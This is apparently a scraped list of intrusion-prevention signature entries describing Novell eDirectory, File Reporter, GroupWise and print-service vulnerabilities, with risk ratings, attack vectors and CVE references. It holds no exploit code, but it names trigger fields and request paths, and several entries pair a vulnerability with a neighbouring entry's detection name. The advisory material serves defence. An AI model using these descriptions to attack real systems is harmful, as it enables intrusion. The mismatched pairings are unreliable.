There is an integer overflow vulnerability in Novell Distributed Print Services module in multiple Novell products. The vulnerability is caused due to lack of proper boundary checks prior to the calculation of the size of a memory buffer. An unauthenticated attacker may exploit this vulnerability to inject and execute arbitrary code in the context of the vulnerable application, Super User in the Netware systems. Successful exploitation of this vulnerability may allow the flow of the process to be diverted to an arbitrary location. In such a case, the behaviour of the target host will be completely dependent on the intention of the injected code. In case of an unsuccessful attack, the Novell Distributed Print Services will terminate, causing a denial of service condition. To restore the functionality, the application or service must be restarted manually.

Situation:

Generic_CS-Novell-Distributed-Print-Services-Integer-Overflow

References:

CVE-2006-2327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2327

BID-17922
http://www.securityfocus.com/bid/17922

OSVDB-25433
http://www.osvdb.org/25433

Novell-eDirectory-dhost-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the handling of HTTP requests loading eDirectory modules in Novell eDirectory

Risk:

High

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Novell eDirectory

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the handling of HTTP requests loading eDirectory modules in Novell eDirectory. By sending a crafted HTTP request with an excessively long module name, a remote authenticated attacker can leverage this vulnerability to execute arbitrary code on the target host with the privileges of the service process, or to cause a denial of service condition.

Situation:

HTTP_CSU-Novell-eDirectory-dhost-Buffer-Overflow
Generic_Novell-eDirectory-dhost-Buffer-Overflow

References:

CVE-2009-4653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4653

BID-36815
http://www.securityfocus.com/bid/36815

Novell-eDirectory-dhost-Httpstk-Buffer-Overflow

About this vulnerability:	A vulnerability in Novell eDirectory
Risk:	High
First detected in:	sgpkg-ips-373-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Novell eDirectory
Type:	Buffer Overflow
Description:	A code execution vulnerability exists in Novell eDirectory. The vulnerability is due to an error in dhost when handling HTTP requests. A remote, authenticated attacker can exploit this vulnerability by sending a specially crafted HTTP request to a vulnerable system. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the system. Code injection that does not result in execution could terminate the service, resulting in Denial of Service condition.
Situation:	Generic_CS-Novell-eDirectory-dhost-Httpstk-Buffer-Overflow

Novell-eDirectory-DOS-Device-Name-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in handling of MS-DOS device names in Novell eDirectory

Risk:

Moderate

First detected in:

sgpkg-ips-66-1210

Last changed:

sgpkg-ips-1639-5242

Platform:

Generic

Software:

Novell eDirectory

Type:

Malfunction

Description:

The Novell eDirectory web server listens on port 8008 for HTTP requests. On the Windows platform, the product has a vulnerability in the handling of MS-DOS devices if user tries to access these using HTTP requests. In some situations, a request to an MS-DOS device name will cause the server process to terminate.

Situation:

File-TextId_Novell-eDirectory-eMBox-Unauthenticated-File-Access

References:

CVE-2005-1729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1729

Novell-eDirectory-eMBox-Unauthenticated-File-Access

About this vulnerability:

A Novell eDirectory eMBox Unauthenticated File Access vulnerability

Risk:

High

First detected in:

sgpkg-ips-798-5211

Last changed:

sgpkg-ips-1453-5242

Platform:

Generic

Software:

Novell eDirectory

Type:

Insecure Configuration

Description:

A vulnerability in Novell eDirectory eMBox, versions 8.7.3.9 and earlier and 8.8.x before 8.8.2, which allows remote attackers to bypass authentication and read arbitrary files via requests for /SOAP URIs.

Situation:

References:

CVE-2008-0926
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0926

BID-28441
http://www.securityfocus.com/bid/28441

OSVDB-43690
http://www.osvdb.org/43690

Novell-eDirectory-HTTP-Request-Content-Length-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell eDirectory

Risk:

High

First detected in:

sgpkg-ips-248-3038

Last changed:

sgpkg-ips-1584-5242

Platform:

Generic

Software:

Novell eDirectory

Type:

Integer Overflow

Description:

There exists a heap buffer overflow vulnerability in Novell eDirectory. The flaw is in the SOAP-HTTP protocol stack due to improper processing of the Content-Length header value. Remote attackers could exploit this vulnerability by sending SOAP-HTTP requests with specially crafted Content-Length value. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the server process. In a sophisticated attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service. In an attack case where code injection is not successful, the affected service may terminate abnormally.

Situation:

HTTP_CRL-Novell-eDirectory-iMonitor-Cross-Site-Scripting

References:

CVE-2008-4478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4478

BID-31553
http://www.securityfocus.com/bid/31553

Novell-eDirectory-iMonitor-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Novell eDirectory

Risk:

Moderate

First detected in:

sgpkg-ips-625-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell eDirectory

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in Novell eDirectory IMONITOR. The vulnerability is due to an input validation error while parsing the rdn parameter. A remote attacker could exploit this vulnerability to execute arbitrary script or HTML code in the user's browser session.

Situation:

References:

CVE-2014-5212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5212

OSVDB-116128
http://www.osvdb.org/116128

Novell-eDirectory-iMonitor-NDS-Server-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Novell eDirectory iMonitor

Risk:

High

First detected in:

sgpkg-ips-68-1314

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

Novell eDirectory

Type:

Buffer Overflow

Description:

There is a stack based buffer overflow vulnerability in Novell eDirectory iMonitor NDS service. A remote attacker can exploit this vulnerability to execute arbitrary code on the target system via a crafted GET, POST or HEAD request.

References:

CVE-2006-2496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2496

BID-18026
http://www.securityfocus.com/bid/18026

OSVDB-25781
http://www.osvdb.org/25781

Novell-eDirectory-LDAP-Null-Search-Parameter-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell eDirectory

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell eDirectory

Type:

Buffer Overflow

Description:

There exists a heap buffer overflow vulnerability in Novell eDirectory. The flaw is due to incorrect calculation when allocating a heap buffer to store search parameters. An unauthenticated remote attacker could exploit this vulnerability by sending a crafted search request to the system. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the server process, normally System for Windows platforms, or root for Unix platforms. In a simple attack case aimed at creating a denial of service condition, the affected eDirectory service will terminate. If the service is not configured to restart automatically, the service will be unavailable until it is restarted manually. In a sophisticated attack scenario where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature of the injected code. Any code injected into the vulnerable component would execute in the security context of the service process. On Windows systems, the service is running as System, by default.

Situation:

LDAP_CS-Novell-eDirectory-LDAP-Null-Search-Parameter-Buffer-Overflow
LDAP_CS-Novell-eDirectory-LDAP-Null-Search-Parameter-Buffer-Overflow-2

References:

CVE-2008-1809
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1809

BID-30175
http://www.securityfocus.com/bid/30175

Novell-eDirectory-NCP-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell eDirectory

Risk:

High

First detected in:

sgpkg-ips-506-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell eDirectory

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in Novell eDirectory NetWare Core Protocol (NCP) stack. The vulnerability is due to lack of bounds checking in the KeyedObjectLogin function, which is in the ds.dlm file in the Windows distribution. A remote attacker could exploit this vulnerability by sending TCP packets with malicious data. Successful exploitation would result in execution of arbitrary attacker code in the security context of the System user.

Situation:

Generic_CS-Novell-eDirectory-NCP-Stack-Buffer-Overflow
Generic_UDP-Novell-eDirectory-NCP-Stack-Buffer-Overflow

References:

CVE-2012-0432
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0432

Novell-eDirectory-NDS-Verb-0x01-Integer-Overflow

About this vulnerability:

A vulnerability in Novell eDirectory

Risk:

High

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell eDirectory

Type:

Buffer Overflow

Description:

An integer overflow vulnerability exists in Novell eDirectory. The flaw is due to an error processing maliciously crafted service requests (NDS Verb 0x1) containing an overly large integer value. A remote unauthenticated attacker can exploit this vulnerability by sending a malicious request to a target host. Successful exploitation could result in execution of arbitrary code within the security context of the server process, which is System by default. An unsuccessful exploit attempt may terminate the affected application abnormally causing a denial of service condition.

Situation:

Generic_CS-Novell-eDirectory-NDS-Verb-0x01-Integer-Overflow

References:

CVE-2009-0895
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0895

BID-37184
http://www.securityfocus.com/bid/37184

Novell-eDirectory-Server-Accept-Language-Buffer-Overflow

About this vulnerability:	Buffer overflow vulnerability in Novell eDirectory Server
Risk:	High
First detected in:	sgpkg-ips-213-2032
Last changed:	sgpkg-ips-1396-5242
Platform:	Generic
Software:	Novell eDirectory
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability exists in Novell eDirectory. The flaw is due to a boundary error when processing HTTP requests. By supplying an overly large number of values for the Accept-Language header, a remote unauthenticated attacker can leverage this vulnerability to inject and execute arbitrary code on the target host with System or root level privileges. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any injected code will be executed with System or root privileges.
Situation:	HTTP_CS-Novell-eDirectory-Server-Accept-Language-Buffer-Overflow

Novell-eDirectory-Server-iMonitor-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Novell eDirectory Server iMonitor

Risk:

Moderate

First detected in:

sgpkg-ips-36-1210

Last changed:

sgpkg-ips-1589-5242

Platform:

Windows

Software:

Novell eDirectory

Type:

Buffer Overflow

Description:

Novell eDirectory Server iMonitor has a buffer overflow vulnerability in 'dhost.exe'. A remote attacker can exploit this vulnerability to execute arbitrary code on the victim machine via a crafted GET request.

Situation:

HTTP_CSU-Novell-eDirectory-Server-iMonitor-Buffer-Overflow

References:

CVE-2005-2551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2551

BID-14548
http://www.securityfocus.com/bid/14548

Novell-eDirectory-Soap-Handling-Accept-Language-Header-Heap-Overflow

About this vulnerability:

A vulnerability in Novell eDirectory

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell eDirectory

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Novell eDirectory.

Situation:

HTTP_CSH-Novell-eDirectory-Soap-Handling-Accept-Language-Header-Heap-Overflow

References:

CVE-2008-4479
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4479

Novell-eDirectory-Unchecked-Length-Denial-Of-Service

About this vulnerability:	A vulnerability in Novell eDirectory
Risk:	Moderate
First detected in:	sgpkg-ips-435-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Novell eDirectory
Type:	Malfunction
Description:	A denial of service vulnerability exists in the LDAP service of Novell eDirectory. An unchecked user-supplied length value is used during memory allocation while parsing incoming LDAP requests. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted packet to the vulnerable server. This can cause the LDAP service to consume an excessive amount of memory, creating a denial of service condition in the LDAP process.
Situation:	HTTPS_SS-Novell-eDirectory-Unchecked-Length-Denial-Of-Service LDAP_CS-Novell-eDirectory-Unchecked-Length-Denial-Of-Service

Novell-File-Reporter-Agent-XML-Parsing-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell File Management Suite

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell File Reporter

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in the Agent component of Novell File Reporter. Specifically, the application does not perform a boundary check on the user-supplied data when processing XML <NAME> tag entities. A remote unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted XML <NAME> tag to the Agent service. Successful exploitation would allow the attacker to execute arbitrary code with the privileges of the affect process, which is SYSTEM.

Situation:

Generic_CS-Novell-File-Reporter-Agent-XML-Parsing-Stack-Buffer-Overflow
HTTPS_CS-Novell-File-Reporter-Agent-XML-Parsing-Stack-Buffer-Overflow

References:

CVE-2011-0994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0994

BID-47144
http://www.securityfocus.com/bid/47144

Novell-File-Reporter-Arbitrary-File-Delete

About this vulnerability:

A Novell File Reporter Arbitrary File Delete vulnerability.

Risk:

High

First detected in:

sgpkg-ips-715-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell File Reporter

Type:

Input Validation

Description:

A vulnerability in Novell File Reporter, versions 1.0.4.2 and before, in NFRAgent.exe, which allows remote attackers to delete arbitrary files via a full pathname in an SRS OPERATION 4 CMD 5 request to /FSF/CMD.

Situation:

HTTP_CRL-Novell-File-Reporter-Arbitrary-File-Delete

References:

CVE-2011-2750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2750

OSVDB-73729
http://www.osvdb.org/73729

Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell File Reporter

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell File Reporter

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in Novell File Reporter Engine. The vulnerability is due to a parsing error when handling attributes within RECORD elements. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the File Reporter Engine. Successful exploitation could result in arbitrary code execution in the SYSTEM context. An unsuccessful exploit attempt may terminate the affected application abnormally, leading to a denial-of-service condition.

Situation:

File-Text_Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow

References:

CVE-2011-2220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2220

BID-48470
http://www.securityfocus.com/bid/48470

Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow-2

About this vulnerability:

A vulnerability in Novell File Reporter

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell File Reporter

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in the Agent component of Novell File Reporter. Specifically, the application does not perform a boundary check on the user-supplied data when processing XML <NAME> tag entities.

Situation:

File-Text_Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow-2

References:

CVE-2011-0994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0994

BID-47144
http://www.securityfocus.com/bid/47144

Novell-File-Reporter-FSFUI-Arbitrary-File-Retrieval

About this vulnerability:

A vulnerability in Novell File Reporter

Risk:

High

First detected in:

sgpkg-ips-494-5211

Last changed:

sgpkg-ips-1733-5242

Platform:

Generic

Software:

Novell File Reporter

Type:

Malfunction

Description:

A file retrieval vulnerability exists in Novell File Reporter. The vulnerability is caused by insufficient authentication when handling FSFUI requests. An remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted request to the server. Successful exploitation could result in arbitrary file retrieval with SYSTEM privileges.

Situation:

File-Text_Novell-File-Reporter-FSFUI-Arbitrary-File-Retrieval

References:

CVE-2012-4958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4958

BID-56579
http://www.securityfocus.com/bid/56579

OSVDB-87573
http://www.osvdb.org/87573

Novell-File-Reporter-FSFUI-Record-Directory-Traversal

About this vulnerability:

A Novell File Reporter FSFUI Record Directory Traversal vulnerability

Risk:

High

First detected in:

sgpkg-ips-782-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell File Reporter

Type:

Directory Traversal

Description:

A vulnerability in Novell File Reporter, version 1.0.2, which allows remote attackers to upload and execute files via a directory traversal while handling requests to /FSF/CMD with FSFUI records with UICMD 130.

Situation:

HTTP_CRL-Novell-File-Reporter-FSFUI-Record-Directory-Traversal

References:

CVE-2012-4959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4959

OSVDB-87573
http://www.osvdb.org/87573

Novell-File-Reporter-SRS-Arbitrary-File-Retrieval

About this vulnerability:

A vulnerability in Novell File Reporter

Risk:

High

First detected in:

sgpkg-ips-499-5211

Last changed:

sgpkg-ips-1733-5242

Platform:

Generic

Software:

Novell File Reporter

Type:

Malfunction

Description:

A file retrieval vulnerability exists in Novell File Reporter. The vulnerability is caused by insufficient authentication when handling SRS requests. An remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted request to the server. Successful exploitation could result in arbitrary file retrieval with SYSTEM privileges.

Situation:

HTTP_CS-Novell-File-Reporter-SRS-Arbitrary-File-Retrieval

References:

CVE-2012-4957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4957

BID-56579
http://www.securityfocus.com/bid/56579

OSVDB-87573
http://www.osvdb.org/87573

Novell-File-Reporter-Vol-Tag-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell File Reporter

Risk:

High

First detected in:

sgpkg-ips-494-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell File Reporter

Type:

Buffer Overflow

Description:

A heap buffer overflow exists in Novell File Reporter. The vulnerability is caused by insufficient bounds checking when handling SRS requests with multiple VOL tags. The resulting unbounded input can overflow a fixed size heap buffer. An remote unauthenticated attacker could exploit these vulnerabilities by sending specially crafted requests to the server. Successful exploitation could result in a heap buffer overflow resulting in code execution with SYSTEM privileges.

Situation:

Generic_CS-Novell-File-Reporter-Vol-Tag-Heap-Buffer-Overflow

References:

CVE-2012-4956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4956

BID-56579
http://www.securityfocus.com/bid/56579

OSVDB-87574
http://www.osvdb.org/87574

Novell-File-Reporter-Vol-Tag-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell File Reporter

Risk:

Moderate

First detected in:

sgpkg-ips-486-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell File Reporter

Type:

Buffer Overflow

Description:

There is a stack buffer overflow exists in NFRAgent.exe, a component of Novell File Reporter. The vulnerability is due to insufficient validation of the XML VOL tag in data received from the network. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted message to the affected service. Successful exploitation could lead to arbitrary code execution in the context of the affected service, which is SYSTEM.

Situation:

Generic_CS-Novell-File-Reporter-Vol-Tag-Stack-Buffer-Overflow

References:

OSVDB-85503
http://www.osvdb.org/85503

Novell-Groupwise-Addressbook-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell GroupWise

Risk:

Moderate

First detected in:

sgpkg-ips-444-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability has been identified in Novell Groupware Client. An attacker can exploit this vulnerability by enticing a user to open a malformed Novell Address Book file (.nab) containing an overly long token. A successful attack would lead to injection and execution of arbitrary code in the security context of the target user. If the code execution attempt does not succeed, the application may terminate abnormally.

Situation:

File-TextId_Novell-Groupwise-Addressbook-Heap-Buffer-Overflow

References:

CVE-2011-4189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4189

OSVDB-79720
http://www.osvdb.org/79720

Novell-Groupwise-Admin-Service-Fileuploadservlet-Directory-Traversal

About this vulnerability:

A vulnerability in Novell GroupWise

Risk:

Moderate

First detected in:

sgpkg-ips-605-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists within the Administration Service of Novell GroupWise 2014. The vulnerability is due to a flaw in handling of a parameter in the FileUploadServlet servlet. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the vulnerable service. Successful exploitation allows an attacker to disclose or destroy arbitrary files on the server.

Situation:

HTTP_CS-Novell-Groupwise-Admin-Service-Fileuploadservlet-Directory-Traversal

References:

CVE-2014-0600
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0600

OSVDB-110461
http://www.osvdb.org/110461

Novell-Groupwise-Agents-HTTP-Request-Remote-Code-Execution

About this vulnerability:

A vulnerability in Novell GroupWise

Risk:

High

First detected in:

sgpkg-ips-381-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in the GroupWise agents HTTP interfaces. The vulnerability is due to a stack buffer overflow while the gwpoa.exe, gwmta.exe and gwia.exe handle HTTP requests. A remote attacker could exploit this vulnerability by sending a crafted HTTP request to the server. Successful exploitation of this vulnerability could allow for the injection and execution of arbitrary code on the target system with System-level privileges.

Situation:

File-Text_Novell-Groupwise-ActiveX-Gwabdlg.dll-Untrusted-Pointer-Dereference

References:

BID-44732
http://www.securityfocus.com/bid/44732

Novell-Groupwise-Client-ActiveX-Gwabdlg.dll-Untrusted-Pointer-Dereference

About this vulnerability:

A vulnerability in Novell GroupWise Client for Windows

Risk:

Moderate

First detected in:

sgpkg-ips-521-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise Client for Windows

Type:

Malfunction

Description:

There is an untrusted pointer dereference vulnerability in the InvokeContact() and GenerateSummaryPage() functions in the gwabdlg.dll component of Novell GroupWise Client for Windows. These functions can be called using an ActiveX control. This vulnerability can be exploited by remote attackers by enticing a user to open a malicious web page. Successful exploitation could result in arbitrary code execution in the context of the currently logged on user.

Situation:

References:

CVE-2013-0804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0804

OSVDB-89699
http://www.osvdb.org/89699

Novell-Groupwise-Client-ActiveX-Gwmim1.ocx-Untrusted-Pointer-Dereference

About this vulnerability:

A vulnerability in Novell GroupWise Client for Windows

Risk:

Moderate

First detected in:

sgpkg-ips-522-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise Client

Type:

Malfunction

Description:

There is an untrusted pointer dereference vulnerability exists in SecManageRecipientCertificates() function in gwmim1.ocx component of Novell GroupWise Client for Windows. This function can be called using an ActiveX control. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to open a malicious web page. Successful exploitation could result in arbitrary code execution in the context of the currently logged on user.

Situation:

File-Text_Novell-Groupwise-Client-Gwmim1.ocx-Untrusted-Pointer-Dereference

References:

CVE-2013-0804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0804

Novell-Groupwise-Client-For-Windows-ActiveX-Code-Execution

About this vulnerability:

A vulnerability in Novell GroupWise Client for Windows

Risk:

Moderate

First detected in:

sgpkg-ips-510-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise Client for Windows

Type:

Malfunction

Description:

A remote code execution vulnerability exists in the ActiveX control for Novell GroupWise Client for Windows. A remote attacker could exploit this vulnerability by enticing a target to view a specially crafted webpage. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user. Unsuccessful exploitation could cause the application to terminate abnormally, resulting in a denial-of-service condition.

Situation:

File-Text_Novell-Groupwise-Client-For-Windows-Vulnerable-Method-Usage

References:

CVE-2012-0439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0439

OSVDB-89700
http://www.osvdb.org/89700

Novell-Groupwise-Client-Img-Tag-Src-Parameter-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Novell GroupWise Client

Risk:

High

First detected in:

sgpkg-ips-138-2032

Last changed:

sgpkg-ips-1729-5242

Platform:

Windows

Software:

Novell GroupWise Client

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell GroupWise Client. The vulnerability is due to a boundary error when processing crafted e-mails, containing malicious HTML IMG tags. A remote unauthenticated attacker could exploit this vulnerability by sending malicious e-mails to the target user. Successful exploitation allows arbitrary code injection and execution with the privileges of the client process, normally equal to the privileges of the currently logged-in user.

Situation:

SMTP_CS-Novell-Groupwise-Client-Img-Tag-Src-Parameter-Buffer-Overflow
File-Text_Novell-Groupwise-Client-Img-Tag-Src-Parameter-Buffer-Overflow-2

References:

CVE-2007-6435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6435

BID-26875
http://www.securityfocus.com/bid/26875

OSVDB-40870
http://www.osvdb.org/40870

Novell-Groupwise-HTTP-Interfaces-Arbitrary-File-Retrieval

About this vulnerability:

A vulnerability in Novell GroupWise Internet Agent

Risk:

Moderate

First detected in:

sgpkg-ips-513-5211

Last changed:

sgpkg-ips-1453-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Directory Traversal

Description:

There is a directory traversal vulnerability in the HTTP interfaces of Novell GroupWise Post Office Agent, Message Transfer Agent and Internet Agent. The vulnerability is due to a failure to sanitize the request URI for directory traversal characters. A remote unauthenticated attacker can exploit this vulnerability by sending specially crafted HTTP requests to a vulnerable interface. Successful exploitation allows an attacker to retrieve arbitrary files with the permissions of the GroupWise agents, normally System on Windows platforms.

Situation:

HTTP_CSU-Novell-Groupwise-HTTP-Interfaces-Arbitrary-File-Retrieval

References:

CVE-2012-0419
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0419

BID-55648
http://www.securityfocus.com/bid/55648

OSVDB-85801
http://www.osvdb.org/85801

Novell-Groupwise-iCal-RRULE-Time-Conversion-Invalid-Array-Indexing

About this vulnerability:

A vulnerability in Novell Groupwise

Risk:

Moderate

First detected in:

sgpkg-ips-416-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Malfunction

Description:

There is an array indexing vulnerability in the GroupWise Internet Agent. The vulnerability is due to improper handling of iCal files attached to e-mails. Specifically, when parsing an RRULE that recurs yearly, the application improperly validates the user-controlled values, which are later used as an index to an array. A remote unauthenticated attacker can exploit this vulnerability by sending an e-mail with a specially crafted iCal file to a vulnerable server. Successful exploitation can result in the execution of arbitrary code with the context of the affected application, which is normally SYSTEM.

Situation:

File-TextId_Novell-Groupwise-iCal-RRULE-Time-Conversion-Invalid-Array-Indexing

References:

CVE-2011-2663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2663

OSVDB-75769
http://www.osvdb.org/75769

Novell-Groupwise-Internet-Agent-Content-Type-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell Groupwise

Risk:

High

First detected in:

sgpkg-ips-381-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Novell GroupWise Internet Agent (GWIA). The vulnerability is due to improper validation of data received within the Content-Type header of received messages. An unauthenticated remote attacker could exploit this vulnerability to execute arbitrary code on the targeted vulnerable installations of GWIA under the context of the SYSTEM user.

Situation:

E-Mail_HCS-Novell-Groupwise-Internet-Agent-Content-Type-Buffer-Overflow

References:

BID-44732
http://www.securityfocus.com/bid/44732

Novell-Groupwise-Internet-Agent-Email-Address-Processing-BOF

About this vulnerability:

Novell GroupWise Internet Agent Email Address Processing Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-223-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in the Novell GroupWise. The vulnerability is due to an error while processing specially crafted SMTP requests. Remote attackers can exploit this vulnerability to execute arbitrary code on the target server. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute with the security privileges of the server. In an attack case where code injection is not successful, the affected process will terminate abnormally.

Situation:

SMTP_Mail-From-Recipient-Name-BOF

References:

CVE-2009-1636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1636

BID-35064
http://www.securityfocus.com/bid/35064

OSVDB-54645
http://www.osvdb.org/54645

OSVDB-54644
http://www.osvdb.org/54644

Novell-Groupwise-Internet-Agent-HTTP-Interface-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell GroupWise

Risk:

Moderate

First detected in:

sgpkg-ips-416-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Buffer Overflow

Description:

There is a remote code execution vulnerability in the Novell GroupWise Internet Agent (GWIA) HTTP interface (port 9850/tcp). The vulnerability is due to a boundary error when parsing overly long HTTP requests to certain .css resources. An unauthenticated remote attacker could exploit this vulnerability to execute arbitrary code on targeted vulnerable installations of GWIA in the context of the SYSTEM user.

Situation:

HTTP_CSU-Novell-Groupwise-Internet-Agent-HTTP-Interface-Stack-Buffer-Overflow

References:

CVE-2011-0334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0334

BID-49779
http://www.securityfocus.com/bid/49779

OSVDB-75774
http://www.osvdb.org/75774

Novell-Groupwise-Internet-Agent-ICalendar-Parsing-Denial-Of-Service

About this vulnerability:

A vulnerability in Novell GroupWise

Risk:

Moderate

First detected in:

sgpkg-ips-488-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Malfunction

Description:

There is a denial of service vulnerability in Novell GroupWise Internet Agent. The vulnerability is due to insufficient validation of the length of time and date information when parsing a received iCalendar message. A remote attacker could exploit this vulnerability by sending an e-mail with a specially crafted .ics attachment to the vulnerable server. Successful exploitation would result in a denial-of-service condition.

Situation:

File-TextId_Novell-Groupwise-Internet-Agent-ICalendar-Parsing-Denial-Of-Service

References:

CVE-2011-3827
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3827

BID-55574
